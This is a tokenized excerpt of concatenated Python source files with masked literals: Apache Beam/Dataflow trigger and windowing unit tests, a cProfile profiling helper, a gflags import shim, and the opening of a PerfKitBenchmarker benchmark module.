timestamp , elem ) ) <EOL> bundle . append ( WindowedValue ( elem , timestamp , windows ) ) <EOL> if len ( bundle ) == group_by : <EOL> bundles . append ( bundle ) <EOL> bundle = [ ] <EOL> bundles . append ( bundle ) <EOL> self . run_trigger ( window_fn , trigger_fn , accumulation_mode , <EOL> bundle_data ( timestamped_data , group_by ) , <EOL> bundle_data ( late_data , group_by ) , <EOL> expected_panes ) <EOL> def run_trigger ( self , window_fn , trigger_fn , accumulation_mode , <EOL> bundles , late_bundles , <EOL> expected_panes ) : <EOL> actual_panes = collections . defaultdict ( list ) <EOL> driver = GeneralTriggerDriver ( <EOL> Windowing ( window_fn , trigger_fn , accumulation_mode ) ) <EOL> state = InMemoryUnmergedState ( ) <EOL> for bundle in bundles : <EOL> for wvalue in driver . 
process_elements ( state , bundle , MIN_TIMESTAMP ) : <EOL> window , = wvalue . windows <EOL> actual_panes [ window ] . append ( set ( wvalue . value ) ) <EOL> while state . timers : <EOL> for timer_window , ( name , time_domain , timestamp ) in ( <EOL> state . get_and_clear_timers ( ) ) : <EOL> for wvalue in driver . process_timer ( <EOL> timer_window , name , time_domain , timestamp , state ) : <EOL> window , = wvalue . windows <EOL> actual_panes [ window ] . append ( set ( wvalue . value ) ) <EOL> for bundle in late_bundles : <EOL> for wvalue in driver . process_elements ( state , bundle , MIN_TIMESTAMP ) : <EOL> window , = wvalue . windows <EOL> actual_panes [ window ] . append ( set ( wvalue . value ) ) <EOL> while state . timers : <EOL> for timer_window , ( name , time_domain , timestamp ) in ( <EOL> state . get_and_clear_timers ( ) ) : <EOL> for wvalue in driver . process_timer ( <EOL> timer_window , name , time_domain , timestamp , state ) : <EOL> window , = wvalue . windows <EOL> actual_panes [ window ] . append ( set ( wvalue . value ) ) <EOL> self . assertEqual ( expected_panes , actual_panes ) <EOL> def test_fixed_watermark ( self ) : <EOL> self . run_trigger_simple ( <EOL> FixedWindows ( <NUM_LIT:10> ) , <EOL> AfterWatermark ( ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT> , '<STR_LIT:c>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:10> ) : [ set ( '<STR_LIT>' ) ] , <EOL> IntervalWindow ( <NUM_LIT:10> , <NUM_LIT:20> ) : [ set ( '<STR_LIT:c>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> , <EOL> <NUM_LIT:3> ) <EOL> def test_fixed_watermark_with_early ( self ) : <EOL> self . run_trigger_simple ( <EOL> FixedWindows ( <NUM_LIT:10> ) , <EOL> AfterWatermark ( early = AfterCount ( <NUM_LIT:2> ) ) , <EOL> AccumulationMode . 
ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:3> , '<STR_LIT:c>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:10> ) : [ set ( '<STR_LIT>' ) , set ( '<STR_LIT:abc>' ) ] } , <EOL> <NUM_LIT:2> ) <EOL> self . run_trigger_simple ( <EOL> FixedWindows ( <NUM_LIT:10> ) , <EOL> AfterWatermark ( early = AfterCount ( <NUM_LIT:2> ) ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:3> , '<STR_LIT:c>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:10> ) : [ set ( '<STR_LIT:abc>' ) , set ( '<STR_LIT:abc>' ) ] } , <EOL> <NUM_LIT:3> ) <EOL> def test_fixed_watermark_with_early_late ( self ) : <EOL> self . run_trigger_simple ( <EOL> FixedWindows ( <NUM_LIT:100> ) , <EOL> AfterWatermark ( early = AfterCount ( <NUM_LIT:3> ) , <EOL> late = AfterCount ( <NUM_LIT:2> ) ) , <EOL> AccumulationMode . DISCARDING , <EOL> zip ( range ( <NUM_LIT:9> ) , '<STR_LIT>' ) , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:100> ) : [ <EOL> set ( '<STR_LIT>' ) , set ( '<STR_LIT>' ) , <EOL> set ( '<STR_LIT:i>' ) , <EOL> set ( '<STR_LIT>' ) , set ( '<STR_LIT>' ) <EOL> ] } , <EOL> <NUM_LIT:2> , <EOL> late_data = zip ( range ( <NUM_LIT:5> ) , '<STR_LIT>' ) ) <EOL> def test_sessions_watermark_with_early_late ( self ) : <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> AfterWatermark ( early = AfterCount ( <NUM_LIT:2> ) , <EOL> late = AfterCount ( <NUM_LIT:1> ) ) , <EOL> AccumulationMode . 
ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:15> , '<STR_LIT:b>' ) , ( <NUM_LIT:7> , '<STR_LIT:c>' ) , ( <NUM_LIT:30> , '<STR_LIT:d>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT> ) : [ <EOL> set ( '<STR_LIT:abc>' ) , <EOL> set ( '<STR_LIT:abc>' ) , <EOL> set ( '<STR_LIT>' ) <EOL> ] , <EOL> IntervalWindow ( <NUM_LIT:30> , <NUM_LIT> ) : [ <EOL> set ( '<STR_LIT:d>' ) , <EOL> ] , <EOL> IntervalWindow ( <NUM_LIT:1> , <NUM_LIT> ) : [ <EOL> set ( '<STR_LIT>' ) <EOL> ] , <EOL> } , <EOL> <NUM_LIT:2> , <EOL> late_data = [ ( <NUM_LIT:1> , '<STR_LIT:x>' ) , ( <NUM_LIT:2> , '<STR_LIT:y>' ) , ( <NUM_LIT> , '<STR_LIT:z>' ) ] ) <EOL> def test_fixed_after_count ( self ) : <EOL> self . run_trigger_simple ( <EOL> FixedWindows ( <NUM_LIT:10> ) , <EOL> AfterCount ( <NUM_LIT:2> ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:3> , '<STR_LIT:c>' ) , ( <NUM_LIT:11> , '<STR_LIT:z>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:10> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> ) <EOL> self . run_trigger_simple ( <EOL> FixedWindows ( <NUM_LIT:10> ) , <EOL> AfterCount ( <NUM_LIT:2> ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:3> , '<STR_LIT:c>' ) , ( <NUM_LIT:11> , '<STR_LIT:z>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:10> ) : [ set ( '<STR_LIT:abc>' ) ] } , <EOL> <NUM_LIT:3> , <EOL> <NUM_LIT:4> ) <EOL> def test_fixed_after_first ( self ) : <EOL> self . run_trigger_simple ( <EOL> FixedWindows ( <NUM_LIT:10> ) , <EOL> AfterFirst ( AfterCount ( <NUM_LIT:2> ) , AfterWatermark ( ) ) , <EOL> AccumulationMode . 
ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:3> , '<STR_LIT:c>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:10> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> ) <EOL> self . run_trigger_simple ( <EOL> FixedWindows ( <NUM_LIT:10> ) , <EOL> AfterFirst ( AfterCount ( <NUM_LIT:5> ) , AfterWatermark ( ) ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:3> , '<STR_LIT:c>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:10> ) : [ set ( '<STR_LIT:abc>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> , <EOL> late_data = [ ( <NUM_LIT:1> , '<STR_LIT:x>' ) , ( <NUM_LIT:2> , '<STR_LIT:y>' ) , ( <NUM_LIT:3> , '<STR_LIT:z>' ) ] ) <EOL> def test_repeatedly_after_first ( self ) : <EOL> self . run_trigger_simple ( <EOL> FixedWindows ( <NUM_LIT:100> ) , <EOL> Repeatedly ( AfterFirst ( AfterCount ( <NUM_LIT:3> ) , AfterWatermark ( ) ) ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> zip ( range ( <NUM_LIT:7> ) , '<STR_LIT>' ) , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:100> ) : [ <EOL> set ( '<STR_LIT:abc>' ) , <EOL> set ( '<STR_LIT>' ) , <EOL> set ( '<STR_LIT>' ) , <EOL> set ( '<STR_LIT>' ) , <EOL> set ( '<STR_LIT>' ) , <EOL> set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> late_data = zip ( range ( <NUM_LIT:3> ) , '<STR_LIT>' ) ) <EOL> def test_sessions_after_all ( self ) : <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> AfterAll ( AfterCount ( <NUM_LIT:2> ) , AfterWatermark ( ) ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:3> , '<STR_LIT:c>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT> ) : [ set ( '<STR_LIT:abc>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> ) <EOL> self . 
run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> AfterAll ( AfterCount ( <NUM_LIT:5> ) , AfterWatermark ( ) ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:3> , '<STR_LIT:c>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> , <EOL> late_data = [ ( <NUM_LIT:1> , '<STR_LIT:x>' ) , ( <NUM_LIT:2> , '<STR_LIT:y>' ) , ( <NUM_LIT:3> , '<STR_LIT:z>' ) ] ) <EOL> def test_sessions_default ( self ) : <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> DefaultTrigger ( ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT:12> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> ) <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> AfterWatermark ( ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:15> , '<STR_LIT:c>' ) , ( <NUM_LIT:16> , '<STR_LIT:d>' ) , ( <NUM_LIT:30> , '<STR_LIT:z>' ) , ( <NUM_LIT:9> , '<STR_LIT:e>' ) , <EOL> ( <NUM_LIT:10> , '<STR_LIT:f>' ) , ( <NUM_LIT:30> , '<STR_LIT:y>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT> ) : [ set ( '<STR_LIT>' ) ] , <EOL> IntervalWindow ( <NUM_LIT:30> , <NUM_LIT> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> , <EOL> <NUM_LIT:3> , <EOL> <NUM_LIT:4> , <EOL> <NUM_LIT:5> , <EOL> <NUM_LIT:6> ) <EOL> def test_sessions_watermark ( self ) : <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> AfterWatermark ( ) , <EOL> AccumulationMode . 
ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT:12> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> ) <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> AfterWatermark ( ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , ( <NUM_LIT:15> , '<STR_LIT:c>' ) , ( <NUM_LIT:16> , '<STR_LIT:d>' ) , ( <NUM_LIT:30> , '<STR_LIT:z>' ) , ( <NUM_LIT:9> , '<STR_LIT:e>' ) , <EOL> ( <NUM_LIT:10> , '<STR_LIT:f>' ) , ( <NUM_LIT:30> , '<STR_LIT:y>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT> ) : [ set ( '<STR_LIT>' ) ] , <EOL> IntervalWindow ( <NUM_LIT:30> , <NUM_LIT> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> , <EOL> <NUM_LIT:3> , <EOL> <NUM_LIT:4> , <EOL> <NUM_LIT:5> , <EOL> <NUM_LIT:6> ) <EOL> def test_sessions_after_count ( self ) : <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> AfterCount ( <NUM_LIT:2> ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:15> , '<STR_LIT:b>' ) , ( <NUM_LIT:6> , '<STR_LIT:c>' ) , ( <NUM_LIT:30> , '<STR_LIT:s>' ) , ( <NUM_LIT> , '<STR_LIT:t>' ) , ( <NUM_LIT:50> , '<STR_LIT:z>' ) , <EOL> ( <NUM_LIT:50> , '<STR_LIT:y>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT> ) : [ set ( '<STR_LIT:abc>' ) ] , <EOL> IntervalWindow ( <NUM_LIT:30> , <NUM_LIT> ) : [ set ( '<STR_LIT>' ) ] , <EOL> IntervalWindow ( <NUM_LIT:50> , <NUM_LIT> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:2> , <EOL> <NUM_LIT:3> ) <EOL> def test_sessions_repeatedly_after_count ( self ) : <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> Repeatedly ( AfterCount ( <NUM_LIT:2> ) ) , <EOL> AccumulationMode . 
ACCUMULATING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:15> , '<STR_LIT:b>' ) , ( <NUM_LIT:6> , '<STR_LIT:c>' ) , ( <NUM_LIT:2> , '<STR_LIT:d>' ) , ( <NUM_LIT:7> , '<STR_LIT:e>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT> ) : [ set ( '<STR_LIT:abc>' ) , set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:3> ) <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> Repeatedly ( AfterCount ( <NUM_LIT:2> ) ) , <EOL> AccumulationMode . DISCARDING , <EOL> [ ( <NUM_LIT:1> , '<STR_LIT:a>' ) , ( <NUM_LIT:15> , '<STR_LIT:b>' ) , ( <NUM_LIT:6> , '<STR_LIT:c>' ) , ( <NUM_LIT:2> , '<STR_LIT:d>' ) , ( <NUM_LIT:7> , '<STR_LIT:e>' ) ] , <EOL> { IntervalWindow ( <NUM_LIT:1> , <NUM_LIT> ) : [ set ( '<STR_LIT:abc>' ) , set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:1> , <EOL> <NUM_LIT:3> ) <EOL> def test_sessions_after_each ( self ) : <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> AfterEach ( AfterCount ( <NUM_LIT:2> ) , AfterCount ( <NUM_LIT:3> ) ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> zip ( range ( <NUM_LIT:10> ) , '<STR_LIT>' ) , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:11> ) : [ set ( '<STR_LIT>' ) ] , <EOL> IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:15> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:2> ) <EOL> self . run_trigger_simple ( <EOL> Sessions ( <NUM_LIT:10> ) , <EOL> Repeatedly ( AfterEach ( AfterCount ( <NUM_LIT:2> ) , AfterCount ( <NUM_LIT:3> ) ) ) , <EOL> AccumulationMode . ACCUMULATING , <EOL> zip ( range ( <NUM_LIT:10> ) , '<STR_LIT>' ) , <EOL> { IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:11> ) : [ set ( '<STR_LIT>' ) ] , <EOL> IntervalWindow ( <NUM_LIT:0> , <NUM_LIT:15> ) : [ set ( '<STR_LIT>' ) ] , <EOL> IntervalWindow ( <NUM_LIT:0> , <NUM_LIT> ) : [ set ( '<STR_LIT>' ) ] } , <EOL> <NUM_LIT:2> ) <EOL> class TriggerPipelineTest ( unittest . TestCase ) : <EOL> def test_after_count ( self ) : <EOL> p = Pipeline ( '<STR_LIT>' ) <EOL> result = ( p <EOL> | df . 
Create ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:10> , <NUM_LIT:11> ] ) <EOL> | df . FlatMap ( lambda t : [ ( '<STR_LIT:A>' , t ) , ( '<STR_LIT:B>' , t + <NUM_LIT:5> ) ] ) <EOL> | df . Map ( lambda ( k , t ) : TimestampedValue ( ( k , t ) , t ) ) <EOL> | df . WindowInto ( FixedWindows ( <NUM_LIT:10> ) , trigger = AfterCount ( <NUM_LIT:3> ) , <EOL> accumulation_mode = AccumulationMode . DISCARDING ) <EOL> | df . GroupByKey ( ) <EOL> | df . Map ( lambda ( k , v ) : ( '<STR_LIT>' % ( k , len ( v ) ) , set ( v ) ) ) ) <EOL> assert_that ( result , equal_to ( <EOL> { <EOL> '<STR_LIT>' : { <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> } , <EOL> '<STR_LIT>' : { <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> } , <EOL> '<STR_LIT>' : { <NUM_LIT:10> , <NUM_LIT:15> , <NUM_LIT:16> } , <EOL> } . iteritems ( ) ) ) <EOL> class TranscriptTest ( unittest . TestCase ) : <EOL> @ classmethod <EOL> def _create_test ( cls , spec ) : <EOL> counter = <NUM_LIT:0> <EOL> name = spec . get ( '<STR_LIT:name>' , '<STR_LIT>' ) <EOL> unique_name = '<STR_LIT>' + name <EOL> while hasattr ( cls , unique_name ) : <EOL> counter += <NUM_LIT:1> <EOL> unique_name = '<STR_LIT>' % ( name , counter ) <EOL> setattr ( cls , unique_name , lambda self : self . _run_log_test ( spec ) ) <EOL> @ classmethod <EOL> def _create_tests ( cls , transcript_filename ) : <EOL> for spec in yaml . load_all ( open ( transcript_filename ) ) : <EOL> cls . _create_test ( spec ) <EOL> def _run_log_test ( self , spec ) : <EOL> if '<STR_LIT:error>' in spec : <EOL> self . assertRaisesRegexp ( <EOL> AssertionError , spec [ '<STR_LIT:error>' ] , self . _run_log , spec ) <EOL> else : <EOL> self . _run_log ( spec ) <EOL> def _run_log ( self , spec ) : <EOL> def parse_int_list ( s ) : <EOL> """<STR_LIT>""" <EOL> s = s . strip ( ) <EOL> assert s [ <NUM_LIT:0> ] == '<STR_LIT:[>' and s [ - <NUM_LIT:1> ] == '<STR_LIT:]>' , s <EOL> if not s [ <NUM_LIT:1> : - <NUM_LIT:1> ] . 
strip ( ) : <EOL> return [ ] <EOL> else : <EOL> return [ int ( x ) for x in s [ <NUM_LIT:1> : - <NUM_LIT:1> ] . split ( '<STR_LIT:U+002C>' ) ] <EOL> def split_args ( s ) : <EOL> """<STR_LIT>""" <EOL> args = [ ] <EOL> start = <NUM_LIT:0> <EOL> depth = <NUM_LIT:0> <EOL> for ix in xrange ( len ( s ) ) : <EOL> c = s [ ix ] <EOL> if c in '<STR_LIT>' : <EOL> depth += <NUM_LIT:1> <EOL> elif c in '<STR_LIT>' : <EOL> depth -= <NUM_LIT:1> <EOL> elif c == '<STR_LIT:U+002C>' and depth == <NUM_LIT:0> : <EOL> args . append ( s [ start : ix ] . strip ( ) ) <EOL> start = ix + <NUM_LIT:1> <EOL> assert depth == <NUM_LIT:0> , s <EOL> args . append ( s [ start : ] . strip ( ) ) <EOL> return args <EOL> def parse ( s , names ) : <EOL> """<STR_LIT>""" <EOL> s = s . strip ( ) <EOL> if s in names : <EOL> return names [ s ] <EOL> elif s [ <NUM_LIT:0> ] == '<STR_LIT:[>' : <EOL> return parse_int_list ( s ) <EOL> elif '<STR_LIT:(>' in s : <EOL> assert s [ - <NUM_LIT:1> ] == '<STR_LIT:)>' , s <EOL> callee = parse ( s [ : s . index ( '<STR_LIT:(>' ) ] , names ) <EOL> posargs = [ ] <EOL> kwargs = { } <EOL> for arg in split_args ( s [ s . index ( '<STR_LIT:(>' ) + <NUM_LIT:1> : - <NUM_LIT:1> ] ) : <EOL> if '<STR_LIT:=>' in arg : <EOL> kw , value = arg . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> kwargs [ kw ] = parse ( value , names ) <EOL> else : <EOL> posargs . append ( parse ( arg , names ) ) <EOL> return callee ( * posargs , ** kwargs ) <EOL> else : <EOL> try : <EOL> return int ( s ) <EOL> except ValueError : <EOL> raise ValueError ( '<STR_LIT>' % s ) <EOL> def parse_fn ( s , names ) : <EOL> """<STR_LIT>""" <EOL> fn = parse ( s , names ) <EOL> if isinstance ( fn , type ) : <EOL> return fn ( ) <EOL> else : <EOL> return fn <EOL> from google . cloud . dataflow . transforms import window as window_module <EOL> from google . cloud . dataflow . transforms import trigger as trigger_module <EOL> window_fn_names = dict ( window_module . __dict__ ) <EOL> window_fn_names . 
update ( { '<STR_LIT>' : <EOL> CustomTimestampingFixedWindowsWindowFn } ) <EOL> trigger_names = { '<STR_LIT>' : DefaultTrigger } <EOL> trigger_names . update ( trigger_module . __dict__ ) <EOL> window_fn = parse_fn ( spec . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> window_fn_names ) <EOL> trigger_fn = parse_fn ( spec . get ( '<STR_LIT>' , '<STR_LIT>' ) , trigger_names ) <EOL> accumulation_mode = getattr ( <EOL> AccumulationMode , spec . get ( '<STR_LIT>' , '<STR_LIT>' ) . upper ( ) ) <EOL> output_time_fn = getattr ( <EOL> OutputTimeFn , spec . get ( '<STR_LIT>' , '<STR_LIT>' ) . upper ( ) ) <EOL> allowed_lateness = float ( spec . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> driver = GeneralTriggerDriver ( <EOL> Windowing ( window_fn , trigger_fn , accumulation_mode , output_time_fn ) ) <EOL> state = InMemoryUnmergedState ( ) <EOL> output = [ ] <EOL> watermark = MIN_TIMESTAMP <EOL> def fire_timers ( ) : <EOL> to_fire = state . get_and_clear_timers ( watermark ) <EOL> while to_fire : <EOL> for timer_window , ( name , time_domain , t_timestamp ) in to_fire : <EOL> for wvalue in driver . process_timer ( <EOL> timer_window , name , time_domain , t_timestamp , state ) : <EOL> window , = wvalue . windows <EOL> output . append ( { '<STR_LIT>' : [ window . start , window . end - <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : sorted ( wvalue . value ) , <EOL> '<STR_LIT>' : wvalue . timestamp } ) <EOL> to_fire = state . get_and_clear_timers ( watermark ) <EOL> for line in spec [ '<STR_LIT>' ] : <EOL> action , params = line . items ( ) [ <NUM_LIT:0> ] <EOL> if action != '<STR_LIT>' : <EOL> self . assertEquals ( <EOL> [ ] , output , msg = '<STR_LIT>' % ( output , line ) ) <EOL> if action == '<STR_LIT:input>' : <EOL> bundle = [ <EOL> WindowedValue ( t , t , window_fn . assign ( WindowFn . AssignContext ( t , t ) ) ) <EOL> for t in params ] <EOL> output = [ { '<STR_LIT>' : [ wvalue . windows [ <NUM_LIT:0> ] . start , <EOL> wvalue . windows [ <NUM_LIT:0> ] . 
end - <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : sorted ( wvalue . value ) , <EOL> '<STR_LIT>' : wvalue . timestamp } <EOL> for wvalue <EOL> in driver . process_elements ( state , bundle , watermark ) ] <EOL> fire_timers ( ) <EOL> elif action == '<STR_LIT>' : <EOL> watermark = params <EOL> fire_timers ( ) <EOL> elif action == '<STR_LIT>' : <EOL> for expected_output in params : <EOL> for candidate in output : <EOL> if all ( candidate [ k ] == expected_output [ k ] <EOL> for k in candidate if k in expected_output ) : <EOL> output . remove ( candidate ) <EOL> break <EOL> else : <EOL> self . fail ( '<STR_LIT>' % ( expected_output , output ) ) <EOL> elif action == '<STR_LIT:state>' : <EOL> pass <EOL> else : <EOL> self . fail ( '<STR_LIT>' + action ) <EOL> self . assertEquals ( [ ] , output , msg = '<STR_LIT>' % output ) <EOL> TRANSCRIPT_TEST_FILE = os . path . join ( os . path . dirname ( __file__ ) , <EOL> '<STR_LIT>' ) <EOL> if os . path . exists ( TRANSCRIPT_TEST_FILE ) : <EOL> TranscriptTest . _create_tests ( TRANSCRIPT_TEST_FILE ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import cProfile <EOL> import logging <EOL> import os <EOL> import pstats <EOL> import StringIO <EOL> import tempfile <EOL> import time <EOL> from google . cloud . dataflow . utils . dependency import _dependency_file_copy <EOL> class Profile ( object ) : <EOL> """<STR_LIT>""" <EOL> SORTBY = '<STR_LIT>' <EOL> def __init__ ( self , profile_id , profile_location = None , log_results = False ) : <EOL> self . stats = None <EOL> self . profile_id = str ( profile_id ) <EOL> self . profile_location = profile_location <EOL> self . log_results = log_results <EOL> def __enter__ ( self ) : <EOL> logging . info ( '<STR_LIT>' , self . profile_id ) <EOL> self . profile = cProfile . Profile ( ) <EOL> self . profile . enable ( ) <EOL> return self <EOL> def __exit__ ( self , * args ) : <EOL> self . profile . disable ( ) <EOL> logging . info ( '<STR_LIT>' , self . profile_id ) <EOL> if self . profile_location : <EOL> dump_location = os . path . join ( <EOL> self . profile_location , '<STR_LIT>' , <EOL> ( '<STR_LIT>' % ( time . strftime ( '<STR_LIT>' ) , self . profile_id ) ) ) <EOL> fd , filename = tempfile . mkstemp ( ) <EOL> self . profile . dump_stats ( filename ) <EOL> logging . info ( '<STR_LIT>' , dump_location ) <EOL> _dependency_file_copy ( filename , dump_location ) <EOL> os . close ( fd ) <EOL> os . remove ( filename ) <EOL> if self . log_results : <EOL> s = StringIO . StringIO ( ) <EOL> self . stats = pstats . Stats ( <EOL> self . profile , stream = s ) . sort_stats ( Profile . SORTBY ) <EOL> self . stats . print_stats ( ) <EOL> logging . info ( '<STR_LIT>' , s . getvalue ( ) ) </s>
<s> import gflags as flags <EOL> try : <EOL> from gflags import validators as flags_validators <EOL> except ImportError : <EOL> from gflags import gflags_validators as flags_validators </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import posixpath <EOL> import re <EOL> import time <EOL> from perfkitbenchmarker import configs <EOL> from perfkitbenchmarker import sample <EOL> from perfkitbenchmarker import vm_util <EOL> from perfkitbenchmarker import flags <EOL> from perfkitbenchmarker . linux_packages import nginx <EOL> from perfkitbenchmarker . linux_packages import php <EOL> BASE_DIR = posixpath . join ( vm_util . VM_TMP_DIR , '<STR_LIT>' ) <EOL> CATALINA_HOME = '<STR_LIT>' % BASE_DIR <EOL> OLIO_HOME = '<STR_LIT>' % BASE_DIR <EOL> FABAN_HOME = '<STR_LIT>' % BASE_DIR <EOL> MYSQL_HOME = '<STR_LIT>' % BASE_DIR <EOL> GEOCODER_HOME = '<STR_LIT>' % BASE_DIR <EOL> APP_DIR = '<STR_LIT>' % BASE_DIR <EOL> JAVA_HOME = '<STR_LIT>' <EOL> PHPRC = posixpath . join ( APP_DIR , '<STR_LIT>' ) <EOL> OUTPUT_DIR = posixpath . join ( vm_util . VM_TMP_DIR , '<STR_LIT>' ) <EOL> ANT_HOME = posixpath . join ( vm_util . VM_TMP_DIR , '<STR_LIT>' ) <EOL> OLIO_BUILD = '<STR_LIT>' % BASE_DIR <EOL> MY_CNF = '<STR_LIT>' <EOL> NGINX_CONF = '<STR_LIT>' % BASE_DIR <EOL> flags . DEFINE_integer ( '<STR_LIT>' , <NUM_LIT:100> , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , lower_bound = <NUM_LIT:2> ) <EOL> FLAGS = 